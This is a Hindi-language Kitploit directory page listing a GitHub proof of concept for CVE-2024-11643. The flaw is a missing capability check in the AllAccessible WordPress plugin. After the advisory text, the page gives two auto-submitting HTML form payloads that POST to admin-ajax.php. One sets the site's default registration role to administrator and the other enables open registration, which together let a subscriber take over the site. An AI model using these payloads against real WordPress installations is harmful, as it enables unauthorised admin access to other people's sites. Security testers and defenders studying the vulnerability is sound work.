Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-11643 — AllAccessible द्वारा अभिगम्यता <= 1.3.4 - प्रमाणित (सब्सक्राइबर+) के लिए प्राधिकरण की कमी जिससे मनमाने विकल्प अपडेट संभव | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-11643
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-11643

CVE-2024-11643

AllAccessible द्वारा अभिगम्यता <= 1.3.4 - प्रमाणित (सब्सक्राइबर+) के लिए प्राधिकरण की कमी जिससे मनमाने विकल्प अपडेट संभव

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-11643

Accessibility by AllAccessible <= 1.3.4 - प्रमाणित सब्सक्राइबर+ के लिए प्राधिकरण की कमी के कारण मनमाना विकल्प अपडेट

विवरण

WordPress के लिए Accessibility by AllAccessible प्लगइन में, संस्करण 1.3.4 तक (और इसमें शामिल), 'AllAccessible_save_settings' फ़ंक्शन पर क्षमता जाँच की कमी के कारण डेटा में अनधिकृत संशोधन संभव है, जो विशेषाधिकार वृद्धि का कारण बन सकता है। इससे प्रमाणित हमलावर, सब्सक्राइबर-स्तरीय पहुँच और उससे ऊपर, WordPress साइट पर मनमाने विकल्प अपडेट कर सकते हैं। इसका उपयोग पंजीकरण के लिए डिफ़ॉल्ट भूमिका को व्यवस्थापक में अपडेट करने और उपयोगकर्ता पंजीकरण सक्षम करने के लिए किया जा सकता है, ताकि हमलावर कमजोर साइट पर व्यवस्थापक उपयोगकर्ता पहुँच प्राप्त कर सकें।

विवरण

  • प्रकार: plugin
  • प्रभावित संस्करण: 1.3.4
  • CVSS स्कोर: 8.8
  • CVSS रेटिंग: उच्च
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-11643
  • स्थिति: सक्रिय

POC

एक सब्सक्राइबर के रूप में लॉगिन करें, फिर इस फॉर्म का उपयोग करके डिफ़ॉल्ट भूमिका को व्यवस्थापक बनाएं, और फिर दूसरे फॉर्म का उपयोग करके उपयोगकर्ताओं को पंजीकरण की अनुमति दें।

डिफ़ॉल्ट भूमिका व्यवस्थापक

root@kitploit:~
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="AllAccessible&#95;save&#95;settings" />
      <input type="hidden" name="opt&#95;name" value="default&#95;role" />
      <input type="hidden" name="opt&#95;value" value="administrator" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

उपयोगकर्ता पंजीकरण कर सकते हैं

root@kitploit:~
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="AllAccessible&#95;save&#95;settings" />
      <input type="hidden" name="opt&#95;name" value="users&#95;can&#95;register" />
      <input type="hidden" name="opt&#95;value" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
टूल डाउनलोड करें